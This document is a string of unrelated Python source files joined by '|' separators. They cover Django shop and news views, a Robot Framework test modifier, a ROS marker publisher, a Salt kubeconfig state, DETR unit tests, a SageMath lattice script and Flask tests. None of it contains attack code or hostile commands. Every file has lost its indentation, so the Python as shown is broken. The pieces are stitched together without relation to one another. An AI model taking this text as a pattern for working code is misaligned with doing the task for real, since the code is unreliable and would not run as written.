def post(self, request: HttpRequest, *args, **kwargs):
order, _ = Order.objects.get_or_create(ordered=False, user=request.user)
if order.order_items.count() < 1:
messages.error(request, "Sorry you do not have any items in your order.")
return redirect("shop:product-list")
if self.kwargs.get("address_pk"):
address_qs = Address.objects.filter(
user=request.user, pk=int(self.kwargs.get("address_pk"))
)
if address_qs.exists():
address = address_qs.first()
else:
messages.error(request, "The given address was not found.")
return self.get(self, request, *args, **kwargs)
else:
address_form = AddressForm(request.POST)
if address_form.is_valid():
address = address_form.save(commit=False)
address.user = request.user
address.save()
order.address = address
order.save()
self.kwargs["address_pk"] = None
messages.success(request, "Address saved.")
return redirect("shop:payment-choice")
class PaymentChoice(LoginRequiredMixin, View):
def get(self, request, *args, **kwargs):
order, _ = Order.objects.get_or_create(ordered=False, user=request.user)
if order.order_items.count() < 1:
messages.error(request, "Sorry you do not have any items in your order.")
return redirect("shop:product-list")
payment_choice_form = PaymentChoiceForm()
return render(
request,
"shop/payment_choices.html",
{"payment_choice_form": payment_choice_form, "order": order},
)
def post(self, request, *args, **kwargs):
order: Order
order, _ = Order.objects.get_or_create(ordered=False, user=request.user)
if order.order_items.count() < 1:
messages.error(request, "Sorry you do not have any items in your order.")
return redirect("shop:product-list")
payment_choice_form = PaymentChoiceForm(request.POST, instance=order)
if payment_choice_form.is_valid():
order = payment_choice_form.save()
if order.payment_method == Order.PaymentChoices.cash:
order.place_order()
messages.success(request, "Your Order has been recorded.")
return redirect("shop:cart")
else:
return redirect(order.get_payment_url())
class MomoPayment(LoginRequiredMixin, View):
def get(self, request, pk=None, *args, **kwargs):
order: Order
if pk:
order = get_object_or_404(Order, user=request.user, pk=pk)
else:
order = get_object_or_404(Order, ordered=False, user=request.user)
if not order.address:
messages.error(request, "Cannot process order for payment without address.")
return redirect("shop:product-list")
if order.order_items.count() < 1:
messages.error(request, "Sorry you do not have any items in your order.")
return redirect("shop:product-list")
payment_qs = order.payments.filter(paid=False, payment_type=Payment.PaymentChoices.momo)
if order.compute_amount_to_pay() <= 0:
return redirect(order.get_absolute_url())
if payment_qs.exists():
payment = payment_qs.first()
payment.amount = order.compute_amount_to_pay()
else:
payment = Payment.objects.create(
order=order,
amount=order.compute_amount_to_pay(),
payment_type=Payment.PaymentChoices.momo,
)
return render(request, "shop/make_payment.html", {'payment': payment, 'order': order, "paystack_public_key": settings.PAYSTACK_PUBLIC_KEY})
class ConfirmMomoPayment(LoginRequiredMixin, DetailView):
model = Payment
def get_queryset(self):
return Payment.objects.filter(order__user=self.request.user)
def get(self, request: HttpRequest, *args, **kwargs) -> HttpResponse:
payment: Payment = self.get_object()
confirmed, message = payment.confirm_payment()
if confirmed:
messages.success(request, message)
payment.order.place_order()
return redirect(payment.order.get_absolute_url())
else:
messages.error(request, message)
return redirect(payment.order.get_payment_url())
class OrderList(LoginRequiredMixin, ListView):
model = Order
context_object_name = "orders"
paginate_by = 12
template_name = "shop/order_list.html"
def get_queryset(self):
return Order.objects.filter(user=self.request.user, ordered=True).order_by(
"is_completed"
)
class OrderDetail(LoginRequiredMixin, DetailView):
model = Order
context_object_name = "order"
template_name = "shop/order_detail.html"
def get_queryset(self):
return Order.objects.filter(user=self.request.user, ordered=True)
class OrderItemDetail(LoginRequiredMixin,DetailView):
model = OrderItem
context_object_name = "order_item"
template_name = "shop/order_item_detail.html"
def get_queryset(self):
return OrderItem.objects.filter(
order__user=self.request.user, order__ordered=True
)
|
"""Pre-run modifier that excludes tests that run PASS last time.
"""
import os
from robot.api import ExecutionResult, ResultVisitor, SuiteVisitor
from robot.running.model import Variable
class rerunfailed(SuiteVisitor):
def __init__(self, original_output_xml):
if not os.path.isfile(original_output_xml):
raise FileNotFoundError(f'{original_output_xml} is no file')
result = ExecutionResult(original_output_xml)
results_visitor = DataDriverResultsVisitor()
result.visit(results_visitor)
self._failed_tests = results_visitor.failed_tests
def start_suite(self, suite):
"""Remove tests that match the given pattern."""
if self._suite_is_data_driven(suite):
dynamic_tests = Variable('@{DYNAMICTESTS}', self._failed_tests, suite.source)
suite.resource.variables.append(dynamic_tests)
else:
suite.tests = [t for t in suite.tests if f'{t.parent.name}.{t.name}' in self._failed_tests]
def _suite_is_data_driven(self, suite):
for resource in suite.resource.imports:
if resource.name == 'DataDriver':
return True
def end_suite(self, suite):
"""Remove suites that are empty after removing tests."""
suite.suites = [s for s in suite.suites if s.test_count > 0]
def visit_test(self, test):
"""Avoid visiting tests and their keywords to save a little time."""
pass
class DataDriverResultsVisitor(ResultVisitor):
def __init__(self):
self.failed_tests = list()
def start_test(self, test):
if test.status == 'FAIL':
self.failed_tests.append(f'{test.parent.name}.{test.name}')
|
from typing import Tuple
from UE4Parse import DefaultFileProvider
from UE4Parse.BinaryReader import BinaryStream
from UE4Parse.Versions import VersionContainer
class StreamedFileProvider(DefaultFileProvider):
def __init__(self, versions: VersionContainer = VersionContainer.default(),
isCaseInsensitive: bool = False):
super().__init__(".", versions, isCaseInsensitive)
def initialize(self, filename: str ,streams: Tuple[BinaryStream]):
self.register_container(filename, streams)
|
#!/usr/bin/env python2
import time
import rospy
from sensor_msgs.msg import JointState
from std_msgs.msg import Header
from visualization_msgs.msg import Marker
import tf
def talker():
rospy.init_node("following_marker", anonymous=True)
pub_marker = rospy.Publisher("visualization_marker", Marker, queue_size=10)
rate = rospy.Rate(20)
listener = tf.TransformListener()
marker_ = Marker()
marker_.header.frame_id = "/joint1"
marker_.ns = "basic_cube"
print("publishing ...")
while not rospy.is_shutdown():
now = rospy.Time.now() - rospy.Duration(0.1)
try:
trans, rot = listener.lookupTransform("joint1", "basic_shapes", now)
except Exception as e:
print(e)
continue
print(type(trans), trans)
print(type(rot), rot)
# marker
marker_.header.stamp = now
marker_.type = marker_.CUBE
marker_.action = marker_.ADD
marker_.scale.x = 0.04
marker_.scale.y = 0.04
marker_.scale.z = 0.04
# marker position initial
marker_.pose.position.x = trans[0]
marker_.pose.position.y = trans[1]
marker_.pose.position.z = trans[2]
marker_.pose.orientation.x = rot[0]
marker_.pose.orientation.y = rot[1]
marker_.pose.orientation.z = rot[2]
marker_.pose.orientation.w = rot[3]
marker_.color.a = 1.0
marker_.color.g = 1.0
pub_marker.publish(marker_)
rate.sleep()
if __name__ == "__main__":
try:
talker()
except rospy.ROSInterruptException:
pass
|
#!/usr/bin/env python3
from json import dumps as json_dumps
from logging.config import dictConfig as logging_dict_config
from modules.api_client import ApiClient
from modules.cache import PickledDictCache
from modules.config import config
def create_client():
return ApiClient(
user=config.github.user,
token=config.github.token,
repo=config.github.repo,
branch=config.github.branch,
min_date=config.github.min_date,
max_date=config.github.max_date,
cache=cache,
)
if __name__ == '__main__':
logging_dict_config(config.logging)
cache = PickledDictCache(config.cache.conn_string)
client = create_client()
reports = (
client.get_top_contributors(),
client.get_pull_request_stats(),
client.get_issue_stats(),
)
cache.save()
if config.report.output_format == 'text':
for r in reports:
print('\n'.join(r.to_table()))
print('\n')
elif config.report.output_format == 'json':
obj = {r.key(): r.to_dict() for r in reports}
print(json_dumps(obj))
|
from django.http import JsonResponse
from django.shortcuts import render
from django.contrib import sessions
from django.views.generic import View
from django.utils import timezone
from app.RoleMethod.PublicMethod import PublicMethod
from django.views import View
from app.serialize.serializer_user import *
from django.core.cache import cache
"""
获取新闻列表
发布新闻
修改新闻
查看新闻
"""
class GetNewList(View):
"""
新闻后台管理列表
接口信息:
get:
获取数据库中记录,返回数据库中的内容
返账信息:
get:
返回前端数据
"""
def get(self, request):
page = request.GET.get('page')
total = request.GET.get('total')
text = request.GET.get('text')
news_id = request.GET.get('news_id')
news = News.objects.all()
if not news_id:
if text:
news = news.filter(Q(news_creator__contains=text) | Q(news_title__contains=text))
news = news.order_by('-news_importance')
news_num = news.count()
news = news[(int(page) - 1) * int(total): int(page) * int(total)]
info = []
for new in news:
info.append({
"news_id": new.news_id,
"news_title": new.news_title,
"news_introduce": new.news_introduce,
"news_creator": new.news_creator,
"create_time": new.creator_time,
"news_type": new.news_type,
"news_importance": new.news_importance,
})
else:
news = news.filter(news_id=news_id).first()
info = {
"news_id": news.news_id,
"news_title": news.news_title,
"news_introduce": news.news_introduce,
"news_creator": news.news_creator,
"create_time": news.creator_time,
"news_type": news.news_type,
"news_importance": news.news_importance,
}
news_num = 1
return JsonResponse({'status': True, "message": info, 'total': news_num})
class AddNews(View):
"""
模块: 新闻管理
接口信息:
post:
put:
返账信息:
post:
put:
"""
def post(self, request):
token = request.COOKIES.get("token")
user_id = cache.get(token)
if not user_id:
return JsonResponse({'status': False, 'message': '未登录'})
capacity = User.objects.filter(user_id=user_id).first().user_power
if capacity > 2:
return JsonResponse({'status': False, 'message': '权限不足'})
news_introduce = request.POST.get("news_introduce")
news_title = request.POST.get("news_title")
news_type = request.POST.get("news_type")
news_importance = request.POST.get('news_importance')
News.objects.create(
news_title=news_title,
news_introduce=news_introduce,
news_creator=user_id,
creator_time=timezone.now(),
news_importance=news_importance,
news_type=news_type
)
return JsonResponse({'status': True, 'message': '新闻创建成功'})
def put(self, request):
token = request.COOKIES.get("token")
user_id = cache.get(token)
if not user_id:
return JsonResponse({'status': False, 'message': '未登录'})
capacity = User.objects.filter(user_id=user_id).first().user_power
news_id = request.GET.get('news_id')
news = News.objects.filter(news_id=news_id).first()
if not news:
return JsonResponse({'status': False, 'message': '此新闻不存在'})
if capacity > 2 or (capacity == 2 and news.news_creator != user_id):
return JsonResponse({'status': False, 'message': '权限不足'})
news_title = request.GET.get("news_title")
if news_title is not None:
news.news_title = news_title
news_introduce = request.GET.get("news_introduce")
if news_introduce is not None:
news.news_introduce = news_introduce
news_importance = request.GET.get('news_importance')
if news_importance is not None:
news.news_importance = news_importance
news_type = request.GET.get("news_type")
if news_type is not None:
news.news_type = news_type
news.save()
return JsonResponse({'status': True, 'message': '修改成功'})
def delete(self, request):
token = request.COOKIES.get("token")
user_id = cache.get(token)
if not user_id:
return JsonResponse({'status': False, 'message': '未登录'})
capacity = User.objects.filter(user_id=user_id).first().user_power
news_id = request.GET.get('news_id')
news = News.objects.filter(news_id=news_id).first()
if not news:
return JsonResponse({'status': False, 'message': '此新闻不存在'})
if capacity > 2 or (capacity == 2 and news.news_creator != user_id):
return JsonResponse({'status': False, 'message': '权限不足'})
news.delete()
return JsonResponse({'status': True, 'message': '删除成功'})
|
import torch
import torch.nn.functional as F
from .strategy_utils import top_k_top_p_filtering
import utils
from decoding_strategy import BaseDecoding
class SinglePassDecoding(BaseDecoding):
def generate(self, model, batch):
net_input = utils.move_to_cuda(batch['net_input'])
encoder_input_ids = net_input['input_ids']
encoder_attn_mask = net_input['attention_mask']
batch_size = encoder_input_ids.shape[0]
encoder = model.get_encoder()
encoder_outputs = encoder(encoder_input_ids,
attention_mask=encoder_attn_mask)
# create empty decoder_input_ids
input_ids = torch.full(
(batch_size, 1),
self.decoder_bos_idx,
dtype=torch.long,
device=next(model.parameters()).device,
)
cur_len = 1
probs = [[] for _ in range(batch_size)]
unfinished_sents = input_ids.new(batch_size).fill_(1)
past = encoder_outputs # defined for encoder-decoder models, None for decoder-only models
while cur_len < self.domain_to_max_len[self.domain]:
model_inputs = self.prepare_inputs_for_generation(input_ids,
past=past,
attention_mask=encoder_attn_mask)
outputs = model(**model_inputs)
next_token_logits = outputs[0][:, -1, :]
past = outputs[1]
if self.do_sampling:
# Temperature (higher temperature => more likely to sample low probability tokens)
if self.temperature != 1.0:
next_token_logits = next_token_logits / self.temperature
# Top-p/top-k filtering
next_token_logits = top_k_top_p_filtering(next_token_logits, top_k=self.topk, top_p=self.topp)
# Sample
next_token_probs = F.softmax(next_token_logits, dim=-1)
next_token = torch.multinomial(next_token_probs, num_samples=1).squeeze(1)
else:
# Greedy decoding
next_token_probs = F.softmax(next_token_logits, dim=-1)
next_token = torch.argmax(next_token_logits, dim=-1)
chosen_token_probs = next_token_probs.gather(1, next_token.view(-1, 1))
for b in range(batch_size):
probs[b].append(chosen_token_probs[b, 0].item())
# pad finished sentences if eos_token_id exist
tokens_to_add = next_token * unfinished_sents + (self.pad_idx) * (1 - unfinished_sents)
if not self.quiet:
output_str = ''
for b in range(batch_size):
w = self.tokenizer.convert_ids_to_tokens([tokens_to_add[b]])[0]
p = probs[b][-1]
output_str += '{:>12}({:.2f})|'.format(w, 100 * p)
if cur_len == 1:
print('=' * 50)
print('step={:<3d}|{}'.format(cur_len, output_str))
input_ids = torch.cat([input_ids, tokens_to_add.unsqueeze(-1)], dim=-1)
eos_in_sents = tokens_to_add == self.eos_idx
unfinished_sents.mul_((~eos_in_sents).long())
# stop when there is a </s> in each sentence, or if we exceed the maximul length
if unfinished_sents.max() == 0:
break
cur_len = cur_len + 1
return input_ids, probs
|
# -*- coding: utf-8 -*-
from base64 import b64encode, b64decode
from datetime import datetime, timedelta
import os
import stat
import yaml
__virtualname__ = 'metalk8s_kubeconfig'
def __virtual__():
return __virtualname__
def _validateKubeConfig(filename,
expected_ca_data,
expected_api_server,
expected_cn):
"""Validate a kubeconfig filename.
Validate that the kubeconfig provided by filename
is conform with config.
This function is used for managed idempotency.
:return: True if the kubeconfig file matches expectation
False otherwise (ie need to be regenerated)
"""
# Verify if the file exists
if not os.path.isfile(filename):
return False
# Verify that the mode is 600
if stat.S_IMODE(os.stat(filename).st_mode) != 0o600:
return False
try:
with open(filename, 'r') as fd:
kubeconfig = yaml.safe_load(fd)
except Exception:
return False
# Verify that the current CA cert on disk matches the expected CA cert
# and the API Server on the existing file match with the expected
try:
cluster_info = kubeconfig['clusters'][0]['cluster']
current_ca_data = cluster_info['certificate-authority-data']
current_api_server = cluster_info['server']
except (KeyError, IndexError):
return False
if current_ca_data != expected_ca_data:
return False
if current_api_server != expected_api_server:
return False
# Client Key and certificate verification
try:
b64_client_key = kubeconfig['users'][0]['user']['client-key-data']
b64_client_cert = kubeconfig['users'][0][
'user']['client-certificate-data']
except (KeyError, IndexError):
return False
try:
client_key = b64decode(b64_client_key)
client_cert = b64decode(b64_client_cert)
except TypeError:
return False
ca_pem_cert = b64decode(current_ca_data)
client_cert_detail = __salt__['x509.read_certificate'](client_cert)
# Verify client cn
try:
current_cn = client_cert_detail['Subject']['CN']
except KeyError:
return False
else:
if current_cn != expected_cn:
return False
# Verify client client cert expiration date is > 30days
try:
expiration_date = client_cert_detail['Not After']
except KeyError:
return False
else:
if datetime.strptime(expiration_date, "%Y-%m-%d %H:%M:%S") \
- timedelta(days=30) < datetime.now():
return False
if __salt__['x509.verify_signature'](
client_cert, ca_pem_cert) is not True:
return False
if __salt__['x509.verify_private_key'](
client_key, client_cert) is not True:
return False
return True
def managed(name,
ca_server,
signing_policy,
client_cert_info,
apiserver,
cluster,
**kwargs):
"""Generate kubeconfig file with identities for control plane components"""
ret = {
'name': name,
'changes': {},
'comment': "",
'result': True,
}
# Get the CA cert from mine
try:
b64_ca_cert = __salt__['mine.get'](
ca_server,
'kubernetes_root_ca_b64'
)[ca_server]
except KeyError:
ret.update({
'comment':
'{0} CA server is not advertized in mine'.format(ca_server),
'result': False
})
return ret
else:
b64_ca_cert = b64_ca_cert.replace('\n', '')
user = client_cert_info.get('CN')
# Validate if a kubeconfig already exists (idempotency)
if _validateKubeConfig(name, b64_ca_cert, apiserver, user):
ret.update({'comment': 'kubeconfig file exists and is up-to-date'})
return ret
client_priv_key = __salt__['x509.create_private_key'](
text=True, verbose=False
)
client_cert = __salt__['x509.create_certificate'](
text=True,
public_key=client_priv_key, # pub key is sourced from priv key
ca_server=ca_server,
signing_policy=signing_policy,
**client_cert_info
)
dataset = {
'apiVersion': 'v1',
'clusters': [
{
'cluster': {
'certificate-authority-data': b64_ca_cert,
'server': apiserver,
},
'name': cluster
}
],
'contexts': [
{
'context': {
'cluster': cluster,
'user': user,
},
'name': '{0}@{1}'.format(user, cluster),
}
],
'current-context': '{0}@{1}'.format(user, cluster),
'kind': 'Config',
'preferences': {},
'users': [
{
'name': user,
'user': {
'client-certificate-data': b64encode(client_cert),
'client-key-data': b64encode(client_priv_key)
}
}
]
}
return __states__['file.serialize'](
name=name,
dataset=dataset,
formatter="yaml",
mode="600",
makedirs=True
)
|
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import unittest
import torch
from models.matcher import HungarianMatcher
from models.position_encoding import PositionEmbeddingSine, PositionEmbeddingLearned
from models.backbone import Backbone
from util import box_ops
from util.misc import nested_tensor_from_tensor_list
from hubconf import detr_resnet50, detr_resnet50_panoptic
from models.deformable_attn import DeformableHeadAttention, generate_ref_points
class Tester(unittest.TestCase):
def test_box_cxcywh_to_xyxy(self):
t = torch.rand(10, 4)
r = box_ops.box_xyxy_to_cxcywh(box_ops.box_cxcywh_to_xyxy(t))
self.assertLess((t - r).abs().max(), 1e-5)
@staticmethod
def indices_torch2python(indices):
return [(i.tolist(), j.tolist()) for i, j in indices]
def test_hungarian(self):
n_queries, n_targets, n_classes = 100, 15, 91
logits = torch.rand(1, n_queries, n_classes + 1)
boxes = torch.rand(1, n_queries, 4)
tgt_labels = torch.randint(high=n_classes, size=(n_targets,))
tgt_boxes = torch.rand(n_targets, 4)
matcher = HungarianMatcher()
targets = [{'labels': tgt_labels, 'boxes': tgt_boxes}]
indices_single = matcher({'pred_logits': logits, 'pred_boxes': boxes}, targets)
indices_batched = matcher({'pred_logits': logits.repeat(2, 1, 1),
'pred_boxes': boxes.repeat(2, 1, 1)}, targets * 2)
self.assertEqual(len(indices_single[0][0]), n_targets)
self.assertEqual(len(indices_single[0][1]), n_targets)
self.assertEqual(self.indices_torch2python(indices_single),
self.indices_torch2python([indices_batched[0]]))
self.assertEqual(self.indices_torch2python(indices_single),
self.indices_torch2python([indices_batched[1]]))
# test with empty targets
tgt_labels_empty = torch.randint(high=n_classes, size=(0,))
tgt_boxes_empty = torch.rand(0, 4)
targets_empty = [{'labels': tgt_labels_empty, 'boxes': tgt_boxes_empty}]
indices = matcher({'pred_logits': logits.repeat(2, 1, 1),
'pred_boxes': boxes.repeat(2, 1, 1)}, targets + targets_empty)
self.assertEqual(len(indices[1][0]), 0)
indices = matcher({'pred_logits': logits.repeat(2, 1, 1),
'pred_boxes': boxes.repeat(2, 1, 1)}, targets_empty * 2)
self.assertEqual(len(indices[0][0]), 0)
def test_position_encoding_script(self):
m1, m2 = PositionEmbeddingSine(), PositionEmbeddingLearned()
mm1, mm2 = torch.jit.script(m1), torch.jit.script(m2) # noqa
def test_backbone_script(self):
backbone = Backbone('resnet50', True, False, False)
torch.jit.script(backbone) # noqa
def test_model_script_detection(self):
model = detr_resnet50(pretrained=False).eval()
scripted_model = torch.jit.script(model)
x = nested_tensor_from_tensor_list([torch.rand(3, 200, 200), torch.rand(3, 200, 250)])
out = model(x)
out_script = scripted_model(x)
self.assertTrue(out["pred_logits"].equal(out_script["pred_logits"]))
self.assertTrue(out["pred_boxes"].equal(out_script["pred_boxes"]))
def test_model_script_panoptic(self):
model = detr_resnet50_panoptic(pretrained=False).eval()
scripted_model = torch.jit.script(model)
x = nested_tensor_from_tensor_list([torch.rand(3, 200, 200), torch.rand(3, 200, 250)])
out = model(x)
out_script = scripted_model(x)
self.assertTrue(out["pred_logits"].equal(out_script["pred_logits"]))
self.assertTrue(out["pred_boxes"].equal(out_script["pred_boxes"]))
self.assertTrue(out["pred_masks"].equal(out_script["pred_masks"]))
def test_model_detection_different_inputs(self):
model = detr_resnet50(pretrained=False).eval()
# support NestedTensor
x = nested_tensor_from_tensor_list([torch.rand(3, 200, 200), torch.rand(3, 200, 250)])
out = model(x)
self.assertIn('pred_logits', out)
# and 4d Tensor
x = torch.rand(1, 3, 200, 200)
out = model(x)
self.assertIn('pred_logits', out)
# and List[Tensor[C, H, W]]
x = torch.rand(3, 200, 200)
out = model([x])
self.assertIn('pred_logits', out)
def test_deformable_attn(self):
defomable_attn = DeformableHeadAttention(h=8,
d_model=256,
k=4,
last_feat_width=16,
last_feat_height=16,
scales=4,
need_attn=True)
defomable_attn = defomable_attn.cuda()
w = 16
h = 16
querys = []
ref_points = []
for i in range(4):
ww = w * 2**i
hh = h * 2**i
q = torch.rand([2, hh, ww, 256])
q = q.cuda()
querys.append(q)
ref_point = generate_ref_points(width=ww, height=hh)
ref_point = ref_point.type_as(q)
ref_points.append(ref_point)
feat, ref_points, attns = defomable_attn(querys[0], querys, ref_points[0])
self.assertTrue(True)
def test_backbone_forward(self):
backbone = Backbone('resnet50', True, True, False)
x = nested_tensor_from_tensor_list([torch.rand(3, 200, 200), torch.rand(3, 200, 250)])
out = backbone(x)
for key, value in out.items():
print('{} {}'.format(key, value.tensors.shape))
def test_transformer_forward(self):
backbone = Backbone('resnet50', True, True, False)
x = nested_tensor_from_tensor_list([torch.rand(3, 200, 200), torch.rand(3, 200, 250)])
out = backbone(x)
for key, value in out.items():
print('{} {}'.format(key, value.tensors.shape))
if __name__ == '__main__':
unittest.main()
|
from optparse import make_option
from django.core.management.base import BaseCommand
from django.db.models import Q
import amo
from addons.models import Addon
from amo.utils import chunked
from devhub.tasks import convert_purified, flag_binary, get_preview_sizes
from market.tasks import check_paypal, check_paypal_multiple
from mkt.webapps.tasks import add_uuids, update_manifests
tasks = {
# binary-components depend on having a chrome manifest.
'flag_binary_components': {'method': flag_binary,
'qs': [Q(type__in=[amo.ADDON_EXTENSION,
amo.ADDON_DICT,
amo.ADDON_LPADDON,
amo.ADDON_PLUGIN,
amo.ADDON_API]),
Q(disabled_by_user=False)],
'kwargs': dict(latest=False)},
'flag_binary': {'method': flag_binary, 'qs': []},
'get_preview_sizes': {'method': get_preview_sizes, 'qs': []},
'convert_purified': {'method': convert_purified, 'qs': []},
'check_paypal': {'pre': check_paypal_multiple,
'method': check_paypal,
'qs': [Q(premium_type=amo.ADDON_PREMIUM,
disabled_by_user=False),
~Q(status=amo.STATUS_DISABLED)]},
'update_manifests': {'method': update_manifests,
'qs': [Q(type=amo.ADDON_WEBAPP, is_packaged=False,
status=amo.STATUS_PUBLIC,
disabled_by_user=False)]},
'add_uuids': {'method': add_uuids,
'qs': [Q(type=amo.ADDON_WEBAPP, guid=None),
~Q(status=amo.STATUS_DELETED)]},
}
class Command(BaseCommand):
"""
A generic command to run a task on addons.
Add tasks to the tasks dictionary, providing a list of Q objects if you'd
like to filter the list down.
method: the method to delay
pre: a method to further pre process the pks, must return the pks (opt.)
qs: a list of Q objects to apply to the method
kwargs: any extra kwargs you want to apply to the delay method (optional)
"""
option_list = BaseCommand.option_list + (
make_option('--task', action='store', type='string',
dest='task', help='Run task on the addons.'),
)
def handle(self, *args, **options):
task = tasks.get(options.get('task'))
if not task:
raise ValueError('Unknown task: %s' % ', '.join(tasks.keys()))
pks = (Addon.objects.filter(*task['qs'])
.values_list('pk', flat=True)
.order_by('-last_updated'))
if 'pre' in task:
pks = task['pre'](pks)
if pks:
for chunk in chunked(pks, 100):
task['method'].delay(chunk, **task.get('kwargs', {}))
|
import psutil
_pids_data = {'lock_pid': None, 'last_pids': set()}
def is_locked(lock_name='i3lock') -> bool:
pids = set(psutil.pids())
if _pids_data['lock_pid']:
if _pids_data['lock_pid'] in pids:
return True
else:
_pids_data['lock_pid'] = None
_pids_data['last_pids'] = pids
return False
new_pids = pids - _pids_data['last_pids']
for pid in new_pids:
try:
with open(f'/proc/{pid}/cmdline', 'rb') as f:
cmdline = f.read().replace(b'\x00', b' ').decode()
if lock_name in cmdline:
_pids_data['lock_pid'] = pid
_pids_data['last_pids'] = pids
return True
except IOError: # proc has already terminated
continue
_pids_data['last_pids'] = pids
return False
|
# Generated by Django 2.0.4 on 2018-04-18 01:34
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('blog', '0007_auto_20180418_0102'),
]
operations = [
migrations.RenameField(
model_name='index',
old_name='sub_Heading',
new_name='sub_heading',
),
migrations.RenameField(
model_name='post',
old_name='banner_Photo',
new_name='banner_photo',
),
migrations.RenameField(
model_name='post',
old_name='Status',
new_name='status',
),
migrations.AlterField(
model_name='post',
name='category',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blog.Category'),
),
migrations.AlterField(
model_name='post',
name='tags',
field=models.ManyToManyField(related_name='Post', to='blog.Tags'),
),
]
|
"""
acl backend
"""
import dnmetis_backend as dnmetis_backend
import backend.backend as backend
import numpy as np
import os
import pdb
class AclBackend(backend.Backend):
def __init__(self):
super(AclBackend, self).__init__()
self.ACL=5
self.outputs = ""
self.inputs = ""
self.model_path = ""
self.cfg_path = ""
def version(self):
return "1.0"
def name(self):
return "AclBackend"
def image_format(self):
# By default tensorflow uses NHWC (and the cpu implementation only does NHWC)
return "NHWC"
def load(self, args):
# there is no input/output meta data i the graph so it need to come from config.
if not args.inputs:
raise ValueError("AclBackend needs inputs")
if not args.outputs:
raise ValueError("AclBackend needs outputs")
self.outputs = args.outputs
self.inputs = args.inputs
self.model_path = args.model
self.cfg_path = args.cfg_path
#s.path.join(args.pwd, 'backend_cfg/built-in_config.txt')
dnmetis_backend.backend_setconfig(self.cfg_path)
dnmetis_backend.backend_load(self.ACL,self.model_path,"")
return self
def predict(self, feed):
#fed=feed[self.inputs[0]]
result_list=[]
result = dnmetis_backend.backend_predict(self.ACL,self.model_path,feed)
for _ in range(len(self.outputs)):
#resnet50 tf & caffe
if 'softmax_tensor' in self.outputs[_] or 'prob' in self.outputs[_]:
result_list.append(np.argmax(result[_],1))
# resnet50 tf
if 'ArgMax' in self.outputs[_]:
result_list.append(result[_])
if result_list == []:
# ssd-resnet34 tf
result_list = result
return result_list
def unload(self):
return dnmetis_backend.backend_unload(self.ACL,self.model_path,"")
|
from .data_structures import \
SDFDataset
from .io import \
IOHandlerSDF
from .fields import \
SDFFieldInfo
|
from sage.all import Zmod, Matrix, factor
def build_matrix(P, M, c=1000):
factors_M = factor(M)
rows = []
# add logarithms
for p in P:
row = []
for q, e in factors_M:
row.extend(Zmod(q ** e)(p).generalised_log()) # generalised_log() uses unit_gens() generators
row = [c * x for x in row] # multiply logs by a large constant to help LLL
rows.append(row)
height = len(rows)
width = len(rows[0])
# add unit matrix
for i, row in enumerate(rows):
row.extend([1 if j == i else 0 for j in range(0, height)])
# add group orders
generators_M = [g for q, e in factors_M for g in Zmod(q ** e).unit_gens()]
for i, g in enumerate(generators_M):
rows.append([g.multiplicative_order() * c if j == i else 0 for j in range(0, width + height)])
return Matrix(rows)
if __name__ == "__main__":
M = 7550611589521 - 1
P = [7, 11, 13, 17, 19, 31, 37, 41, 59, 61, 73, 97, 109, 151, 181, 233, 241, 257, 331, 349, 433, 523, 577, 631, 673,
929, 1103, 1321, 1741, 2089, 4177, 5569, 6961, 7309, 8353, 9281, 13921, 17401, 23311, 29581, 38737, 41761,
50993, 54001, 57367, 59393, 61681, 75169, 82129, 109621, 127481, 135721, 146161, 168781, 224461, 286831,
458929, 501121, 509921, 605531, 680803, 789961, 1529761, 1733729, 2416861, 3033169, 3327229, 4334321, 4487297,
4589281, 4818061, 4876111, 5446417, 7060051, 7553921, 8318071, 8369281]
X = build_matrix(P, M)
print(X)
print("solving...")
print(X.BKZ(block_size=40)) # the second row should contain the solution
|
import os
import pytest
from flask import url_for
from . import BrewlogTests
@pytest.mark.usefixtures('client_class')
class TestMainPageAnonUser(BrewlogTests):
TEMPLATES_DIR = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
'src/brewlog/templates',
)
@pytest.fixture(autouse=True)
def set_up(self):
self.url = url_for('home.index')
self.regular_brewery_name = 'regular brewery no 1'
self.hidden_brewery_name = 'hidden brewery no 1'
self.regular_brew_name = 'regular brew no 1'
self.hidden_brew_name = 'hidden brew no 1'
def test_common_elements(self):
rv = self.client.get(self.url)
assert '>Brew Log</a>' in rv.text
assert 'login page' in rv.text
def test_profile_visibility(self, user_factory):
public_user = user_factory(is_public=True)
hidden_user = user_factory(is_public=False)
rv = self.client.get(self.url)
assert public_user.full_name in rv.text
assert hidden_user.full_name not in rv.text
def test_brewery_visibility_regular_user(self, user_factory, brewery_factory):
public_user = user_factory(is_public=True)
brewery = brewery_factory(
brewer=public_user, name=self.regular_brewery_name
)
rv = self.client.get(self.url)
assert public_user.full_name in rv.text
assert brewery.name in rv.text
def test_brewery_visibility_hidden_user(self, user_factory, brewery_factory):
user = user_factory(is_public=False)
brewery = brewery_factory(
brewer=user, name=self.hidden_brewery_name
)
rv = self.client.get(self.url)
assert user.full_name not in rv.text
assert brewery.name not in rv.text
def test_brew_visibility_regular_brew_regular_user(
self, brew_factory, brewery_factory, user_factory,
):
user = user_factory(is_public=True)
brewery = brewery_factory(
brewer=user, name=self.regular_brewery_name
)
brew = brew_factory(brewery=brewery, name=self.regular_brew_name)
rv = self.client.get(self.url)
assert user.full_name in rv.text
assert brewery.name in rv.text
assert brew.name in rv.text
def test_brew_visibility_regular_brew_hidden_user(
self, brew_factory, brewery_factory, user_factory,
):
user = user_factory(is_public=False)
brewery = brewery_factory(
brewer=user, name=self.regular_brewery_name
)
brew = brew_factory(brewery=brewery, name=self.regular_brew_name)
rv = self.client.get(self.url)
assert user.full_name not in rv.text
assert brewery.name not in rv.text
assert brew.name not in rv.text
def test_brew_visibility_hidden_brew_hidden_user(
self, brew_factory, brewery_factory, user_factory,
):
user = user_factory(is_public=False)
brewery = brewery_factory(
brewer=user, name=self.regular_brewery_name
)
brew = brew_factory(
brewery=brewery, name=self.regular_brew_name, is_public=False
)
rv = self.client.get(self.url)
assert user.full_name not in rv.text
assert brewery.name not in rv.text
assert brew.name not in rv.text
def test_brew_visibility_hidden_brew_regular_user(
self, brew_factory, brewery_factory, user_factory,
):
user = user_factory(is_public=True)
brewery = brewery_factory(
brewer=user, name=self.regular_brewery_name
)
brew = brew_factory(
brewery=brewery, name=self.regular_brew_name, is_public=False
)
rv = self.client.get(self.url)
assert user.full_name in rv.text
